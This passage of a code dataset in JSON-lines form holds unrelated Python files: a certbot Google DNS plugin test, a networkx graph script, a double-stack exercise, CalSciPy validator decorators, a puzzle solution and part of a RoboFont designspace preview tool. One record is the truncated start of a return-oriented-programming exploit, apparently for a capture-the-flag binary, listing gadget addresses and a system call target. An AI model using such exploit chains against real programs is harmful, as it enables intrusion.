'/not/a/real/path.json'\nAPI_ERROR = Error()\nPROJECT_ID = \"test-test-1\"\n\n\nclass AuthenticatorTest(test_util.TempDirTestCase, dns_test_common.BaseAuthenticatorTest):\n\n def setUp(self):\n super(AuthenticatorTest, self).setUp()\n\n from certbot_dns_google.dns_google import Authenticator\n\n path = os.path.join(self.tempdir, 'file.json')\n open(path, \"wb\").close()\n\n super(AuthenticatorTest, self).setUp()\n self.config = mock.MagicMock(google_credentials=path,\n google_propagation_seconds=0) # don't wait during tests\n\n self.auth = Authenticator(self.config, \"google\")\n\n self.mock_client = mock.MagicMock()\n # _get_google_client | pylint: disable=protected-access\n self.auth._get_google_client = mock.MagicMock(return_value=self.mock_client)\n\n def test_perform(self):\n self.auth.perform([self.achall])\n\n expected = [mock.call.add_txt_record(DOMAIN, '_acme-challenge.'+DOMAIN, mock.ANY, mock.ANY)]\n self.assertEqual(expected, self.mock_client.mock_calls)\n\n def test_cleanup(self):\n # _attempt_cleanup | pylint: disable=protected-access\n self.auth._attempt_cleanup = True\n self.auth.cleanup([self.achall])\n\n expected = [mock.call.del_txt_record(DOMAIN, '_acme-challenge.'+DOMAIN, mock.ANY, 
mock.ANY)]\n self.assertEqual(expected, self.mock_client.mock_calls)\n\n @mock.patch('httplib2.Http.request', side_effect=ServerNotFoundError)\n def test_without_auth(self, unused_mock):\n self.config.google_credentials = None\n self.assertRaises(PluginError, self.auth.perform, [self.achall])\n\n\nclass GoogleClientTest(unittest.TestCase):\n record_name = \"foo\"\n record_content = \"bar\"\n record_ttl = 42\n zone = \"ZONE_ID\"\n change = \"an-id\"\n\n def _setUp_client_with_mock(self, zone_request_side_effect):\n from certbot_dns_google.dns_google import _GoogleClient\n\n client = _GoogleClient(ACCOUNT_JSON_PATH)\n\n # Setup\n mock_mz = mock.MagicMock()\n mock_mz.list.return_value.execute.side_effect = zone_request_side_effect\n\n mock_changes = mock.MagicMock()\n\n client.dns.managedZones = mock.MagicMock(return_value=mock_mz)\n client.dns.changes = mock.MagicMock(return_value=mock_changes)\n\n return client, mock_changes\n\n @mock.patch('googleapiclient.discovery.build')\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google._GoogleClient.get_project_id')\n def test_client_without_credentials(self, get_project_id_mock, credential_mock,\n unused_discovery_mock):\n from certbot_dns_google.dns_google import _GoogleClient\n _GoogleClient(None)\n self.assertFalse(credential_mock.called)\n self.assertTrue(get_project_id_mock.called)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n @mock.patch('certbot_dns_google.dns_google._GoogleClient.get_project_id')\n def test_add_txt_record(self, get_project_id_mock, credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n credential_mock.assert_called_once_with('/not/a/real/path.json', mock.ANY)\n self.assertFalse(get_project_id_mock.called)\n\n client.add_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n expected_body = {\n \"kind\": \"dns#change\",\n \"additions\": [\n {\n \"kind\": \"dns#resourceRecordSet\",\n \"type\": \"TXT\",\n \"name\": self.record_name + \".\",\n \"rrdatas\": [self.record_content, ],\n \"ttl\": self.record_ttl,\n },\n ],\n }\n\n changes.create.assert_called_with(body=expected_body,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_and_poll(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n changes.create.return_value.execute.return_value = {'status': 'pending', 'id': self.change}\n changes.get.return_value.execute.return_value = {'status': 'done'}\n\n client.add_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n changes.create.assert_called_with(body=mock.ANY,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n changes.get.assert_called_with(changeId=self.change,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), 
create=True)\n def test_add_txt_record_error_during_zone_lookup(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock(API_ERROR)\n\n self.assertRaises(errors.PluginError, client.add_txt_record,\n DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_zone_not_found(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock([{'managedZones': []},\n {'managedZones': []}])\n\n self.assertRaises(errors.PluginError, client.add_txt_record,\n DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_error_during_add(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n changes.create.side_effect = API_ERROR\n\n self.assertRaises(errors.PluginError, client.add_txt_record,\n DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n expected_body = {\n \"kind\": \"dns#change\",\n \"deletions\": [\n {\n \"kind\": \"dns#resourceRecordSet\",\n \"type\": \"TXT\",\n \"name\": self.record_name + \".\",\n \"rrdatas\": [self.record_content, ],\n \"ttl\": self.record_ttl,\n },\n ],\n }\n\n changes.create.assert_called_with(body=expected_body,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record_error_during_zone_lookup(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock(API_ERROR)\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record_zone_not_found(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock([{'managedZones': []},\n {'managedZones': []}])\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record_error_during_delete(self, unused_credential_mock):\n client, changes = 
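These tests lean on the `return_value` vs `side_effect` distinction in `unittest.mock`: the first is handed back from a call, the second is raised instead when it is an exception (as with `API_ERROR` above). A minimal refresher:

```python
from unittest import mock

api = mock.MagicMock()
api.fetch.return_value = {"status": "done"}   # normal call result
print(api.fetch())                            # {'status': 'done'}

api.fetch.side_effect = RuntimeError("boom")  # raised instead of returned
try:
    api.fetch()
except RuntimeError as exc:
    print(exc)                                # boom
```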
self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n changes.create.side_effect = API_ERROR\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n def test_get_project_id(self):\n from certbot_dns_google.dns_google import _GoogleClient\n\n response = DummyResponse()\n response.status = 200\n\n with mock.patch('httplib2.Http.request', return_value=(response, 1234)):\n project_id = _GoogleClient.get_project_id()\n self.assertEqual(project_id, 1234)\n\n failed_response = DummyResponse()\n failed_response.status = 404\n\n with mock.patch('httplib2.Http.request',\n return_value=(failed_response, \"some detailed http error response\")):\n self.assertRaises(ValueError, _GoogleClient.get_project_id)\n\n with mock.patch('httplib2.Http.request', side_effect=ServerNotFoundError):\n self.assertRaises(ServerNotFoundError, _GoogleClient.get_project_id)\n\n\nclass DummyResponse(object):\n \"\"\"\n Dummy object to create a fake HTTPResponse (the actual one requires a socket and we only\n need the status attribute)\n \"\"\"\n def __init__(self):\n self.status = 200\n\nif __name__ == \"__main__\":\n unittest.main() # pragma: no cover\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/11259_dns_google_test.py","file_name":"11259_dns_google_test.py","file_ext":"py","file_size_in_byte":11381,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"18531217967","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nG = nx.Graph()\n\nfor node in range(1, 9):\n G.add_node(node)\nfor (a, b) in ((1, 2), (1, 3), (1, 5), (1, 7), (2, 4), (2, 6), (3, 5), (3, 6), (3, 8), (4, 8)):\n G.add_edge(a, b)\n\nG.nodes(data=True)\nlist(G.nodes.data())\n\nG.edges(data=True)\nlist(G.edges.data())\n\nnx.draw(G, with_labels=True, node_size=400, node_shape='8', node_color='#42cbed',\n edge_color='#706f6f', style='dotted')\n\nplt.show()\nplt.savefig('graph.png')\n","repo_name":"KatarzynaLeja/Python","sub_path":"12/12_2.py","file_name":"12_2.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15636732161","text":"left = [-1]\r\nright = [100]\r\n\r\ndef push1(a,x):\r\n \r\n if left[0] + 1 < right[0]:\r\n left[0] += 1\r\n a[left[0]] = x\r\n \r\ndef push2(a,x):\r\n \r\n if left[0] < right[0] - 1:\r\n right[0] -= 1\r\n a[right[0]] = x\r\n \r\ndef pop1(a):\r\n \r\n if left[0] > -1:\r\n removed = a[left[0]]\r\n left[0] -= 1\r\n return removed\r\n \r\n else:\r\n return -1\r\n \r\ndef pop2(a):\r\n \r\n if right[0] < 100:\r\n removed = a[right[0]]\r\n right[0] += 1\r\n return removed\r\n \r\n else:\r\n return -1\r\n","repo_name":"suy1968/DATA-STRUCTURES-AND-ALGORITHMS","sub_path":"Stack/Implement 2 stack in an array.py","file_name":"Implement 2 stack in an array.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8651219272","text":"from __future__ import annotations\nfrom typing import Callable, Tuple, Any\nfrom functools import wraps\nfrom pathlib import Path\nimport string\n\n\ndef collector(pos: int, key: str, *args, **kwargs) -> Tuple[bool, Any, bool]:\n # noinspection PyBroadException\n try:\n if key in kwargs:\n collected = True\n use_args = False\n target = kwargs.get(key)\n elif pos is not None and args[pos] is not None:\n collected = True\n use_args = True\n target = args[pos]\n else:\n raise 
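The double-stack module above grows stack 1 up from index 0 and stack 2 down from index 99 in one shared array, using one-element lists (`left`, `right`) as mutable module-level cursors so the functions can update them without `global`. A usage sketch against those functions:

```python
# Usage sketch for the shared-array double stack above: stack 1 grows
# from index 0 upward, stack 2 from index 99 downward, and pushes are
# refused once the two cursors would cross.
a = [None] * 100
push1(a, "s1-first")
push1(a, "s1-second")
push2(a, "s2-first")
print(pop1(a))  # s1-second
print(pop2(a))  # s2-first
print(pop2(a))  # -1 (stack 2 is empty again)
```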
Exception\n except Exception: # if any exception, just report a failure to collect\n collected = False\n use_args = None\n target = None\n # noinspection PyUnboundLocalVariable\n return collected, target, use_args\n\n\ndef parameterize(decorator: Callable) -> Callable:\n \"\"\"\n Function for decorating decorators with parameters\n\n :param decorator: a decorator\n\n :type decorator: Callable\n \"\"\"\n\n def outer(*args, **kwargs) -> Callable:\n\n def inner(func: Callable) -> Callable:\n # noinspection PyArgumentList\n return decorator(func, *args, **kwargs)\n\n return inner\n\n return outer\n\n\n@parameterize\ndef convert_permitted_types_to_required(function: Callable,\n permitted: Tuple,\n required: Any,\n pos: int = 0,\n key: str = None) -> Callable:\n \"\"\"\n Decorator that converts a tuple of permitted types to type supported by the decorated method\n\n :param function: function to be decorated\n :type function: Callable\n :param permitted: permitted types\n :type permitted: tuple\n :param required: type required by code\n :type required: Any\n :param pos: index of argument to be converted\n :type pos: int\n :param key: keyword of argument to be converted\n :type key: str\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n\n collected, allowed_input, use_args = collector(pos, key, *args, **kwargs)\n\n if collected:\n if isinstance(allowed_input, permitted):\n allowed_input = required(allowed_input)\n\n if not isinstance(allowed_input, required):\n raise TypeError(f\"{pos}, {key}\")\n\n if use_args:\n args = amend_args(args, allowed_input, pos)\n else:\n kwargs[key] = allowed_input\n\n return function(*args, **kwargs)\n\n return decorator\n\n\n@parameterize\ndef validate_extension(function: Callable, required_extension: str, pos: int = 0, key: str = None) \\\n -> Callable: # noqa: U100\n \"\"\"\n Decorator for validating extension requirements\n\n :param function: function to be decorated\n :type function: Callable\n :param required_extension: required extension\n :type required_extension: str\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n if not Path(args[pos]).suffix:\n args = amend_args(args, \"\".join([str(args[pos]), required_extension]), pos)\n if Path(args[pos]).suffix != required_extension:\n raise ValueError(f\"Input {pos}: filepath must contain the required extension {required_extension}\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\n@parameterize\ndef validate_matrix(function: Callable, pos: int = 0, key: str = None) -> Callable:\n \"\"\"\n Decorator for validating matrices\n\n :param function: function to be decorated\n :type function: Callable\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n var_input = args[pos]\n if len(var_input.shape) != 2:\n raise AssertionError(f\"Input {pos}, {key}: required to be in matrix format\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\n@parameterize\ndef validate_filename(function: Callable, pos: int = 0, key: str = None) -> Callable: # noqa: U100\n \"\"\"\n Decorator for validating filenames\n\n :param function: function to be decorated\n :type function: Callable\n :param pos: index of the argument to be validated\n :type pos: 
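A caller-side sketch of `convert_permitted_types_to_required`, assuming the module above is importable as `CalSciPy._validators` (per the file path): a `str` passed in position 0 is coerced to `pathlib.Path` before the body runs, and any other type raises `TypeError`:

```python
from pathlib import Path

from CalSciPy._validators import convert_permitted_types_to_required

# Hypothetical decorated function: strings in position 0 (or keyword
# "path") become pathlib.Path objects before load() executes.
@convert_permitted_types_to_required(permitted=(str,), required=Path, pos=0, key="path")
def load(path: Path) -> str:
    return path.name

print(load("data/session.npy"))  # session.npy
```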
int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n string_input = str(args[pos]).split(\"\\\\\")[-1]\n if not set(string_input) <= set(string.ascii_letters + string.digits + \".\" + \"_\"):\n raise ValueError(\"Invalid Filename: filenames are limited to standard letters and digits only.\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\ndef amend_args(arguments: Tuple, amendment: Any, pos: int = 0) -> Tuple:\n \"\"\"\n Function amends arguments tuple (~scary tuple mutation~)\n\n :param arguments: arguments to be amended\n :type arguments: tuple\n :param amendment: new value of argument\n :type amendment: Any\n :param pos: index of argument to be converted\n :type pos: int\n :return: amended arguments\n :rtype: Tuple\n \"\"\"\n\n arguments = list(arguments)\n arguments[pos] = amendment\n return tuple(arguments)\n\n\n@parameterize\ndef validate_evenly_divisible(function: Callable, numerator: int = 0, denominator: int = 1, axis: int = 1) -> Callable:\n \"\"\"\n Decorator for validating existence of paths\n\n :param function: function to be decorated\n :type function: Callable\n :param numerator: position of numerator for division\n :type numerator: int\n :param denominator: position of denominator for division\n :type denominator: int\n :param axis: axis of numerator to divide\n :type axis: int\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n numerator_val = args[numerator]\n denominator_val = args[denominator]\n\n if numerator_val.shape[axis] // denominator_val != numerator_val.shape[axis] / denominator_val:\n raise AssertionError(\"error\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n\n\n@parameterize\ndef validate_tensor(function: Callable, pos: int = 0, key: str = None) -> Callable:\n \"\"\"\n Decorator to assert argument is a tensor\n\n :param function: function to be decorated\n :type function: Callable\n :param pos: index of the argument to be validated\n :type pos: int\n :param key: keyword of the argument to be validated\n \"\"\"\n @wraps(function)\n def decorator(*args, **kwargs) -> Callable:\n var_input = args[pos]\n if len(var_input.shape) != 3:\n raise AssertionError(f\"{pos}, {key}\")\n # noinspection PyArgumentList\n return function(*args, **kwargs)\n return decorator\n","repo_name":"darikoneil/CalSciPy","sub_path":"CalSciPy/_validators.py","file_name":"_validators.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4268396811","text":"import sys\n\ninput = sys.stdin.readline\n\ns = int(input())\n\ncur = 0\n\ni = 1\nwhile True:\n cur += i\n if cur > s:\n i = i - 1\n break\n elif cur == s:\n break\n i += 1\n\n\nprint(i)\n","repo_name":"Koeunseooooo/Algorithm","sub_path":"백준/알고리즘다지기/1789.py","file_name":"1789.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29485936387","text":"import struct\n\ndata_section = 0x601050\nsystem_call = 0x0000000000400810\nmov_r14_r15 = 0x0000000000400820\npop_r14_pop_r15 = 0x0000000000400890 # pop r14; pop r15; ret;\npop_rdi = 0x0000000000400893 # pop rdi; ret;\n\ndef stringpacker(addr):\n return str(struct.pack(\"'\n self.interpolationProblemMessage = 
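The `stringpacker` fragment above is cut off mid-call; nothing after `struct.pack("` survives, so the exact format string is an assumption. The usual idiom for x86-64 ROP payloads packs a little-endian unsigned 64-bit address:

```python
import struct

def stringpacker(addr):
    # "<Q" = little-endian unsigned 64-bit, the usual encoding for
    # x86-64 gadget addresses; an assumed completion of the truncated
    # helper above (which returned str(...) in Python-2 style).
    return struct.pack("<Q", addr)

print(stringpacker(0x0000000000400810).hex())  # 1008400000000000
```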
self.textBox((0,0,0,0),self.interpolationProblemMessageTxt,alignment=\"center\",textColor=(1,0,0,1),fontSize=(\"Monaco\",10))\n self.interpolationProblemMessage.show(False)\n\n addObserver(self, \"mouseDragged\",\"MT.prevMouseDragged\")\n addObserver(self, \"updateFontsCallback\",\"MT.designspace.fontMastersChanged\")\n addObserver(self, \"rightMouseDownCallback\",\"MT.prevRightMouseDown\")\n addObserver(self, \"currentGlyphChangedCallback\", \"currentGlyphChanged\")\n\n def updateInfo(self):\n\n horValue = self.currentLoc.get(self.windowAxes[\"horizontal axis\"])\n self.horAxisInfo.set(f'{self.windowAxes[\"horizontal axis\"]} - {horValue}')\n verValue = self.currentLoc.get(self.windowAxes[\"vertical axis\"])\n self.verAxisInfo.set(f'{self.windowAxes[\"vertical axis\"]} - {verValue}')\n\n def textBox(self,posSize,title,textColor,fontSize,alignment=\"left\"):\n if isinstance(textColor,tuple):\n color =AppKit.NSColor.colorWithCalibratedRed_green_blue_alpha_(*textColor)\n else:\n color = textColor\n font = AppKit.NSFont.fontWithName_size_(*fontSize)\n #cell.setTextColor_(color)\n txtBox = TextBox(posSize,title,alignment=alignment)\n nsTextFiled = txtBox.getNSTextField()\n nsTextFiled.setTextColor_(color)\n nsTextFiled.setFont_(font)\n return txtBox\n\n def updateFontsCallback(self, sender):\n if sender is not None:\n self.designspace = sender['designspace']\n \n def currentGlyphChangedCallback(self,sender):\n if CurrentGlyph() is not None:\n self.glyphName = CurrentGlyph().name\n self.interpolationProblemMessageTxt = f'glyph \"{self.glyphName}\" '\n\n self.setGlyph(self.glyphName, self.currentLoc)\n\n def rightMouseDownCallback(self,sender):\n for l in self.rightClickGroup:\n l.setSelection([])\n\n def menuItemCallback(self,sender):\n if sender.getSelection():\n curr_axisList = sender\n if curr_axisList.axis == \"vertical axis\":\n second_axisList = self.rightClickGroup[0]\n elif curr_axisList.axis == \"horizontal axis\":\n second_axisList = self.rightClickGroup[1]\n rowIndex = curr_axisList.getSelection()[0]\n allitems = curr_axisList.get()\n secondAllItems = second_axisList.get()\n secondItem = secondAllItems[rowIndex]\n item = allitems[rowIndex]\n\n if secondItem[second_axisList.axis] == item[curr_axisList.axis] and secondItem[\"set\"] == self.check:\n secondItem[\"set\"] = \"\"\n self.windowAxes[second_axisList.axis] = None\n curr_axisList.set(secondAllItems)\n\n # popupbutton imitation:\n itemChoosenAxisName = item[curr_axisList.axis]\n if item[\"set\"] != self.check:\n item[\"set\"] = self.check\n self.windowAxes[curr_axisList.axis] = itemChoosenAxisName\n else:\n item[\"set\"] = \"\"\n self.windowAxes[curr_axisList.axis] = None\n\n for other_item in allitems:\n if item != other_item:\n other_item[\"set\"] = \"\"\n curr_axisList.set(allitems)\n second_axisList.setSelection([])\n curr_axisList.setSelection([])\n self.updateInfo()\n\n def sliderCallback(self, sender):\n self.currentLoc[sender.axisName] = round(sender.get())\n\n self.setGlyph(self.glyphName,self.currentLoc)\n self.updateInfo()\n\n def _setContextualMenu(self):\n y,x,p = (10,10,10)\n axisPopUpMenuItem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\"axisPopUp\", '', '')\n columnDescriptions_hor = [{\"title\": \"set\",\"width\":8},{\"title\": \"horizontal axis\"}]\n columnDescriptions_ver = [{\"title\": \"set\",\"width\":8},{\"title\": \"vertical axis\"}]\n # group is going to be a container for\n # two lists, that will behave\n # like a popup buttons\n group = Group((0,0,220+3*p,100))\n group._list_hor = 
MTList((x, y, 110, -p), self.axesList_hor, columnDescriptions=columnDescriptions_hor,doubleClickCallback=self.menuItemCallback,transparentBackground=True,)\n group._list_hor.axis = \"horizontal axis\"\n group._list_ver = MTList((x+110+p, y, 110, -p), self.axesList_ver, columnDescriptions=columnDescriptions_ver,doubleClickCallback=self.menuItemCallback,transparentBackground=True,)\n group._list_ver.axis = \"vertical axis\"\n self.rightClickGroup = [group._list_hor,group._list_ver]\n # setting the appearance of the lists\n for l in self.rightClickGroup:\n l.setSelection([])\n NSTable = l.getNSTableView()\n NSTable.setSelectionHighlightStyle_(1)\n NSTable.tableColumns()[0].headerCell().setTitle_(\"\")\n sliderItems = []\n\n self.sliderItems = []\n for i,item in enumerate(self.axesList_ver):\n axis_name = item[\"vertical axis\"]\n minValue = self.axesInfo[axis_name][\"minimum\"]\n maxValue = self.axesInfo[axis_name][\"maximum\"]\n value = self.currentLoc[axis_name]\n sliderItem = MTSliderAxisMenuItem(axis_name, value, minValue, maxValue, self.sliderCallback)\n self.sliderItems.append(sliderItem)\n\n # Building NSMenu\n view = group.getNSView()\n axisPopUpMenuItem.setView_(view)\n\n builder = MenuBuilder([\n axisPopUpMenuItem,\n ]+[item for item in self.sliderItems])\n\n self.menu = builder.getMenu()\n self.menu.setMinimumWidth_(120)\n self.menu.setAutoenablesItems_(False)\n view.setFrame_(((0, 0), (220+3*p, 2*p+23+23*len(self.axesList_hor))))\n self.getNSBox().rightMenu = self.menu\n\n\n def setDesignSpace(self, designspace):\n\n self.designspace = designspace\n self.glyphName = \"A\"\n self.axesInfo = {}\n for axisInfo in self.designspace.getSerializedAxes():\n info = {}\n info[\"minimum\"] = axisInfo[\"minimum\"]\n info[\"maximum\"] = axisInfo[\"maximum\"]\n info[\"range\"] = axisInfo[\"maximum\"]-axisInfo[\"minimum\"]\n\n self.axesInfo[axisInfo['name']] = info\n if designspace.findDefault() is not None:\n self.currentLoc = designspace.findDefault().location\n self.lastAllLocations = deepcopy(designspace.findDefault().location)\n else:\n self.currentLoc = {}\n self.lastAllLocations = {name:0 for name in self.axesInfo.keys()}\n self.axesList_hor = []\n self.axesList_ver = []\n for axis in designspace.getSerializedAxes():\n self.axesList_hor += [{\"set\":\"\",\"horizontal axis\":axis['name']}]\n self.axesList_ver += [{\"set\":\"\",\"vertical axis\":axis['name']}]\n self.getDefaultLoc = 0 # later replace it with special finding default loc\n self._setContextualMenu()\n self.setGlyph(self.glyphName,self.currentLoc)\n\n def setGlyph(self,name, loc=None):\n if loc is None or loc == {}:\n return\n if name is None:\n return\n for axisname in loc:\n self.lastAllLocations[axisname] = loc[axisname]\n self.updateInfo()\n try:\n self.interpolationProblemMessage.show(False)\n self.glyphView.setGlyph(self._getInterpolation(name, self.lastAllLocations))\n except:\n self.interpolationProblemMessage.show(True)\n\n def _updateSliders(self):\n if hasattr(self, \"sliderItems\"):\n for item in self.sliderItems:\n slider = item.getSlider()\n value = self.lastAllLocations[slider.axisName]\n slider.set(value)\n\n def mouseDragged(self, data):\n _x,_y,_w,_h = self.getPosSize()\n x,y = data[\"cursorpos\"]\n w,h = data[\"framesize\"]\n w,h = (w+_w, h+_h) ## hardcoded, still didn't figured out\n horizontalAxisName = self.windowAxes[\"horizontal axis\"]\n verticalAxisName = self.windowAxes[\"vertical axis\"]\n horizontalAxisValue = None\n verticalAxisValue = None\n currentLoc = {}\n\n\n if horizontalAxisName is not 
None:\n axis_info = self.axesInfo[horizontalAxisName]\n horizontalAxisValue = axis_info[\"minimum\"] + x/w * axis_info[\"range\"]\n if self.roundLocations: horizontalAxisValue = round(horizontalAxisValue)\n if verticalAxisName is not None:\n axis_info = self.axesInfo[verticalAxisName]\n verticalAxisValue = axis_info[\"minimum\"] + y/h * axis_info[\"range\"]\n if self.roundLocations: verticalAxisValue = round(verticalAxisValue)\n if horizontalAxisValue is not None:\n currentLoc[horizontalAxisName] = horizontalAxisValue\n if verticalAxisValue is not None:\n currentLoc[verticalAxisName] = verticalAxisValue\n\n self.currentLoc = currentLoc\n self.setGlyph(self.glyphName, self.currentLoc)\n self._updateSliders()\n\n\n def _getInterpolation(self,name,loc):\n instanceDescriptor = InstanceDescriptor()\n instanceDescriptor.location = loc\n try:\n glyphMutator = self.designspace.getGlyphMutator(name, decomposeComponents=True)\n glyphMath = glyphMutator.makeInstance(instanceDescriptor.location, bend=True)\n glyph = RGlyph().naked()\n iterGlyph = glyphMath.extractGlyph(glyph, glyph.getPointPen(), onlyGeometry=True)\n if iterGlyph is not None:\n glyph = RGlyph()\n pen = glyph.getPen()\n iterGlyph.draw(pen)\n glyph.moveBy((-glyphMath.width/2,-20))\n glyph.transformBy((.4, 0, 0, .4, 0, 0))\n return glyph\n else:\n return glyph\n except:\n print(name, \"doesn't interpolate\")\n\n\n def mainWindowClose(self):\n removeObserver(self, \"MT.prevMouseDragged\")\n removeObserver(self, \"MT.prevRightMouseDown\")\n removeObserver(self, \"currentGlyphChanged\")\n\n\nclass MTToolbar(Group):\n \"\"\"\n items = [{\n dict(objname=\"objname\",\n imageObject=imageObject,\n toolTip=\"toolTip\",\n callback=callback)\n }]\n \"\"\"\n\n def __init__(self, pos, items, itemSize, padding=0):\n\n x, y = pos\n w = len(items) * itemSize + (len(items) - 1) * padding\n posSize = (x, y, w, itemSize)\n super().__init__(posSize)\n\n self.toolNames = []\n self.itemSize = itemSize\n self.padding = padding\n x = 0\n for item in items:\n posSize = (x, 0, itemSize, itemSize)\n self.toolNames += [item[\"objname\"]]\n\n toolbarItemObj = self.ToolbarItem(\n posSize, imageObject=item[\"imageObject\"], toolTip=item[\"toolTip\"], callback=item[\"callback\"])\n setattr(self, item[\"objname\"], toolbarItemObj)\n x += itemSize + padding\n self.len = len(items)\n\n def setPosSize(self, posSize):\n x, y, w, h = posSize\n oldx, oldy, oldw, oldh = self.getPosSize()\n standardWidth = self.len * self.itemSize + self.padding * self.len - 1\n\n super().setPosSize((oldx, oldy, w, h))\n if w > standardWidth:\n for i, objName in enumerate(self.toolNames):\n toolbarItem = getattr(self, objName)\n item_x, item_y, item_w, item_h = toolbarItem.getPosSize()\n factor = w / standardWidth\n item_x = (w - standardWidth) / 2 + i * item_w\n toolbarItem.setPosSize((item_x, item_y, item_w, item_h))\n elif w < standardWidth:\n for i, objName in enumerate(self.toolNames):\n toolbarItem = getattr(self, objName)\n item_x, item_y, item_w, item_h = toolbarItem.getPosSize()\n factor = w / standardWidth\n item_h = factor * self.itemSize\n item_w = w / self.len\n item_y = self.itemSize / 2 - item_h / 2\n item_x = i * item_w\n\n toolbarItem.setPosSize((item_x, item_y, item_w, item_h))\n toolbarItem.getNSButton().setImageScaling_(factor)\n\n def ToolbarItem(self, posSize, imageObject=None, toolTip=None, callback=None):\n toolbaritem = GradientButton(posSize, imageObject=imageObject, bordered=False,\n callback=self.toolbarItemStatusUpdateCB)\n if toolTip is not None:\n 
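`mouseDragged` above maps the pointer position linearly onto each configured axis, `minimum + fraction-of-window × range`, optionally rounding when `roundLocations` is set. The mapping in isolation:

```python
def pointer_to_axis_value(pos, extent, minimum, maximum, round_values=True):
    # Linear map of a pointer coordinate onto a designspace axis,
    # mirroring mouseDragged() above: min + fraction-of-window * range.
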